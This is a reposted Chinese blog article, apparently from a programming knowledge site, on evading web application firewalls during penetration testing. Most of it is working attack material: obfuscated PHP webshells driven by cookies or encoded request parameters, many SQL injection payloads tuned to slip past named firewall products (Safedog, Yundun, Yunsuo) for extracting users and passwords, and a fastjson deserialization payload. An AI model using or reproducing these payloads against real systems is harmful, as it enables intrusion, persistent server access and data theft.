IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> web渗透中bypass防护系统 -> 正文阅读

[PHP知识库]web渗透中bypass防护系统

1. webshell执行命令

文件上传后向webshell传参数:

  1. 三重url编码
  2. 三重base64编码
  3. cookie传参
  4. 参数污染

http://test/xx.jsp?a=xxx很多的垃圾字符xxx&cmd=whoami

cookie传参对应webshell:

x=ls

<?php
$p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p;
?>
<?php
$poc ="axsxsxexrxt";
$poc_1 = explode("x", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];
$poc_2(urldecode(urldecode(urldecode($_REQUEST[x]))));
?>

2. sql注入

2.1 安全狗

mssql

安全狗对负数不是很敏感,对数学运算后的布尔值也不是敏感。会拦截单引号。

and @@version>~1
and (user|1)>-1
and (db_name()|1)>.1

如果from后面直接跟字符或者数字,安全狗会拦截。这时候可以使用下面语句来爆表名:

and ~1=(select top 1 name from[sysobjects]);--

使用下面的语句来加上xtype的限制条件,只输出用户创建的表,可以用char或者hex编码绕过:

and ~1=(select top 1 name from[sysobjects] where xtype=0x75);--
and ~1=(select top 1 name from[sysobjects] where xtype=0x75 and name not in (CHAR(105)%2BCHAR(110)%2BCHAR(102)%2BCHAR(111),CHAR(97)%2BCHAR(100)%2BCHAR(109)%2BCHAR(105)%2BCHAR(110)));

尝试使用内联注释进行绕过:

?id=1 union/*!1*/select null,name,null from [info]--*/

利用注释加换行,这个很好用

?id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/
?id=1--/*%0aexec xp_create_subdir 'c:\text'--%20*/

mysql

在这里插入图片描述
判断注入

?id='1'|1
?id='1'|2
?id='1'&2
?id='1'&1
?id='1'<~1
?id=1' and CONCAT(1)-- +
?id=1' and CONCAT(0)-- +	
?id=1' and CONV(1,11,2)-- +
?id=1' and CONV(0,11,2)-- +
?id=1' and BINARY 1-- +
?id=1' and BINARY 0-- +	

内联注释绕过,fuzz版本号
在这里插入图片描述

?id=1' union/*!11440select*/ 1,2,3--+ 
?id=-1' union/*!11440/**/%0aselect*/ 1,2,3--+

注释加换行,重点就在如何让换行符起作用:

union %23%0aall select
union  -- hex()%0a select

参数污染,在php/apache 中 它总解析最后一个id

?id=-1' /*&id='union select 1,user(),3 -- +*/
?id=-1' /*&id=' union  -- hex()%0a select 1,schema_name,3 from `information_schema`.schemata limit 1,1\

绕过information_schema:

`information_schema`.schemata
`information_schema`.`schemata`
information_schema.`schemata`
(information_schema.schemata)
information_schema/**/.schemata

时间盲注:

and!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)

布尔盲注

/*!%26%26*/ substr((select hex(user/**/(/*!*/))),1,1)=r  #结果如果为true,则用户有可能是root
and!!!substr((select unhex(hex(user/**/(/*!*/)))),1,1)=r
/*!%26%26*/ substr((select hex(user/**/(/*!*/))),1,1)>1
and!!!substr((select unhex(hex(user/**/(/*!*/)))),1,1)=unhex(72)

在这里插入图片描述

在这里插入图片描述


报错注入

 /*updatexml*/(1,1,1)
 /*!5000updatexml*/(1,1,1)
  /*!11440updatexml*/(1,1,1)
  /*!%26%26*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)   #and运算符
  /*!xor*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1)
   | /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1) 
   xor /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1) 
   /*!||*/ /*!11440updatexml*/(1,(select hex(user/**/(/**/))),1) 
?id=1' and `updatexml`(1,(select hex(user/**/(/**/))),1)-- +

2.2 云盾

mysql

云盾无法被/**/这种符号bypass,因此内联注释无法使用,但是它对逻辑运算符的符号形式过滤不是特别强。

用&&替代and用||替代or即可,用!代替非逻辑。

and ~1=1  

and!!!1=1 

and 1-1   

and true

and 1

盲注

and!!!substr((select user-- (1)%0a()),1,1)='r'

union

union(select 1,2,3)

报错注入

and `updatexml`(1,select `user`%0a(),1) 

2.3 云锁

mysql

在这里插入图片描述

and 'a'-0 #后面的值是0,相当于and 0
and 'a'|1 #后面的值是1,相当于and 1

布尔盲注利用注释和换行

and strcmp((substr((select user/**/()),2,1)),'0')
?id=1'  and strcmp((substr((select /*from*/),2,1)),'0')-- + 
?id=1'  and strcmp((substr((select password/* -- + %0afrom/**/users limit 0,1),1,1)),'D')-- +

报错注入

?id=1'  and `updatexml`(1,concat(0x7e,(select user/**/()),0x7e),1)/**/-- +

fastjson

safeline

{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}

参考文章

Bypass MySQL Safedog
Bypass MySQL Yunsuo
MYSQL_SQL_BYPASS_WIKI
bypass的常见思路

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-28 11:40:17  更:2022-01-28 11:41:41 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:35:57-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码